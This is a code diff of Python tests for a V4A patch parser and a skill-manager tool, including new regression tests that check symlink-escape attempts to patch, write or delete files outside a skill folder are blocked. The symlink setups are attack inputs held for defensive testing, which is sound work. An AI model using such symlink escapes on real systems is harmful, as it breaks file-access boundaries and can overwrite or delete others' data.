return SimpleNamespace(error=None)
|
||||
|
||||
file_ops = FakeFileOps()
|
||||
result = apply_v4a_operations(ops, file_ops)
|
||||
assert result.success is True
|
||||
assert long_line in file_ops.written, "Long line was truncated"
|
||||
assert "... [truncated]" not in file_ops.written
|
||||
|
||||
|
||||
class TestValidationPhase:
|
||||
"""Bug 2 regression tests — validation prevents partial apply."""
|
||||
|
||||
def test_validation_failure_writes_nothing(self):
|
||||
"""If one hunk is invalid, no files should be written."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: a.py
|
||||
def good():
|
||||
- return 1
|
||||
+ return 2
|
||||
*** Update File: b.py
|
||||
THIS LINE DOES NOT EXIST
|
||||
- old
|
||||
+ new
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
written = {}
|
||||
|
||||
class FakeFileOps:
|
||||
def read_file_raw(self, path):
|
||||
files = {
|
||||
"a.py": "def good():\n return 1\n",
|
||||
"b.py": "completely different content\n",
|
||||
}
|
||||
content = files.get(path)
|
||||
if content is None:
|
||||
return SimpleNamespace(content=None, error=f"File not found: {path}")
|
||||
return SimpleNamespace(content=content, error=None)
|
||||
|
||||
def write_file(self, path, content):
|
||||
written[path] = content
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
result = apply_v4a_operations(ops, FakeFileOps())
|
||||
assert result.success is False
|
||||
assert written == {}, f"No files should have been written, got: {list(written.keys())}"
|
||||
assert "validation failed" in result.error.lower()
|
||||
|
||||
def test_all_valid_operations_applied(self):
|
||||
"""When all operations are valid, all files are written."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: a.py
|
||||
def foo():
|
||||
- return 1
|
||||
+ return 2
|
||||
*** Update File: b.py
|
||||
def bar():
|
||||
- pass
|
||||
+ return True
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
written = {}
|
||||
|
||||
class FakeFileOps:
|
||||
def read_file_raw(self, path):
|
||||
files = {
|
||||
"a.py": "def foo():\n return 1\n",
|
||||
"b.py": "def bar():\n pass\n",
|
||||
}
|
||||
return SimpleNamespace(content=files[path], error=None)
|
||||
|
||||
def write_file(self, path, content):
|
||||
written[path] = content
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
result = apply_v4a_operations(ops, FakeFileOps())
|
||||
assert result.success is True
|
||||
assert set(written.keys()) == {"a.py", "b.py"}
|
||||
|
||||
|
||||
class TestApplyDelete:
|
||||
"""Tests for _apply_delete producing a real unified diff."""
|
||||
|
||||
def test_delete_diff_contains_removed_lines(self):
|
||||
"""_apply_delete must embed the actual file content in the diff, not a placeholder."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Delete File: old/stuff.py
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
class FakeFileOps:
|
||||
deleted = False
|
||||
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(
|
||||
content="def old_func():\n return 42\n",
|
||||
error=None,
|
||||
)
|
||||
|
||||
def delete_file(self, path):
|
||||
self.deleted = True
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
file_ops = FakeFileOps()
|
||||
result = apply_v4a_operations(ops, file_ops)
|
||||
|
||||
assert result.success is True
|
||||
assert file_ops.deleted is True
|
||||
# Diff must contain the actual removed lines, not a bare comment
|
||||
assert "-def old_func():" in result.diff
|
||||
assert "- return 42" in result.diff
|
||||
assert "/dev/null" in result.diff
|
||||
|
||||
def test_delete_diff_fallback_on_empty_file(self):
|
||||
"""An empty file should produce the fallback comment diff."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Delete File: empty.py
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
class FakeFileOps:
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(content="", error=None)
|
||||
|
||||
def delete_file(self, path):
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
result = apply_v4a_operations(ops, FakeFileOps())
|
||||
assert result.success is True
|
||||
# unified_diff produces nothing for two empty inputs — fallback comment expected
|
||||
assert "Deleted" in result.diff or result.diff.strip() == ""
|
||||
|
||||
|
||||
class TestCountOccurrences:
|
||||
def test_basic(self):
|
||||
from tools.patch_parser import _count_occurrences
|
||||
assert _count_occurrences("aaa", "a") == 3
|
||||
assert _count_occurrences("aaa", "aa") == 2
|
||||
assert _count_occurrences("hello world", "xyz") == 0
|
||||
assert _count_occurrences("", "x") == 0
|
||||
|
||||
|
||||
class TestParseErrorSignalling:
|
||||
"""Bug 3 regression tests — parse_v4a_patch must signal errors, not swallow them."""
|
||||
|
||||
def test_update_with_no_hunks_returns_error(self):
|
||||
"""An UPDATE with no hunk lines is a malformed patch and should error."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: foo.py
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is not None, "Expected a parse error for hunk-less UPDATE"
|
||||
assert ops == []
|
||||
|
||||
def test_move_without_destination_returns_error(self):
|
||||
"""A MOVE without '->' syntax should not silently produce a broken operation."""
|
||||
# The move regex requires '->' so this will be treated as an unrecognised
|
||||
# line and the op is never created. Confirm nothing crashes and ops is empty.
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Move File: src/foo.py
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
# Either parse sees zero ops (fine) or returns an error (also fine).
|
||||
# What is NOT acceptable is ops=[MOVE op with empty new_path] + err=None.
|
||||
if ops:
|
||||
assert err is not None, (
|
||||
"MOVE with missing destination must either produce empty ops or an error"
|
||||
)
|
||||
|
||||
def test_valid_patch_returns_no_error(self):
|
||||
"""A well-formed patch must still return err=None."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: f.py
|
||||
ctx
|
||||
-old
|
||||
+new
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
assert len(ops) == 1
|
||||
|
||||
@@ -5,6 +5,8 @@ from contextlib import contextmanager
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
from tools.skill_manager_tool import (
|
||||
_validate_name,
|
||||
_validate_category,
|
||||
@@ -330,6 +332,25 @@ word word
|
||||
result = _patch_skill("nonexistent", "old", "new")
|
||||
assert result["success"] is False
|
||||
|
||||
def test_patch_supporting_file_symlink_escape_blocked(self, tmp_path):
|
||||
outside_file = tmp_path / "outside.txt"
|
||||
outside_file.write_text("old text here")
|
||||
|
||||
with _skill_dir(tmp_path):
|
||||
_create_skill("my-skill", VALID_SKILL_CONTENT)
|
||||
link = tmp_path / "my-skill" / "references" / "evil.md"
|
||||
link.parent.mkdir(parents=True, exist_ok=True)
|
||||
try:
|
||||
link.symlink_to(outside_file)
|
||||
except OSError:
|
||||
pytest.skip("Symlinks not supported")
|
||||
|
||||
result = _patch_skill("my-skill", "old text", "new text", file_path="references/evil.md")
|
||||
|
||||
assert result["success"] is False
|
||||
assert "boundary" in result["error"].lower()
|
||||
assert outside_file.read_text() == "old text here"
|
||||
|
||||
|
||||
class TestDeleteSkill:
|
||||
def test_delete_existing(self, tmp_path):
|
||||
@@ -375,6 +396,25 @@ class TestWriteFile:
|
||||
result = _write_file("my-skill", "secret/evil.py", "malicious")
|
||||
assert result["success"] is False
|
||||
|
||||
def test_write_symlink_escape_blocked(self, tmp_path):
|
||||
outside_dir = tmp_path / "outside"
|
||||
outside_dir.mkdir()
|
||||
|
||||
with _skill_dir(tmp_path):
|
||||
_create_skill("my-skill", VALID_SKILL_CONTENT)
|
||||
link = tmp_path / "my-skill" / "references" / "escape"
|
||||
link.parent.mkdir(parents=True, exist_ok=True)
|
||||
try:
|
||||
link.symlink_to(outside_dir, target_is_directory=True)
|
||||
except OSError:
|
||||
pytest.skip("Symlinks not supported")
|
||||
|
||||
result = _write_file("my-skill", "references/escape/owned.md", "malicious")
|
||||
|
||||
assert result["success"] is False
|
||||
assert "boundary" in result["error"].lower()
|
||||
assert not (outside_dir / "owned.md").exists()
|
||||
|
||||
|
||||
class TestRemoveFile:
|
||||
def test_remove_existing_file(self, tmp_path):
|
||||
@@ -391,6 +431,27 @@ class TestRemoveFile:
|
||||
result = _remove_file("my-skill", "references/nope.md")
|
||||
assert result["success"] is False
|
||||
|
||||
def test_remove_symlink_escape_blocked(self, tmp_path):
|
||||
outside_dir = tmp_path / "outside"
|
||||
outside_dir.mkdir()
|
||||
outside_file = outside_dir / "keep.txt"
|
||||
outside_file.write_text("content")
|
||||
|
||||
with _skill_dir(tmp_path):
|
||||
_create_skill("my-skill", VALID_SKILL_CONTENT)
|
||||
link = tmp_path / "my-skill" / "references" / "escape"
|
||||
link.parent.mkdir(parents=True, exist_ok=True)
|
||||
try:
|
||||
link.symlink_to(outside_dir, target_is_directory=True)
|
||||
except OSError:
|
||||
pytest.skip("Symlinks not supported")
|
||||
|
||||
result = _remove_file("my-skill", "references/escape/keep.txt")
|
||||
|
||||
assert result["success"] is False
|
||||
assert "boundary" in result["error"].lower()
|
||||
assert outside_file.exists()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# skill_manage dispatcher
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user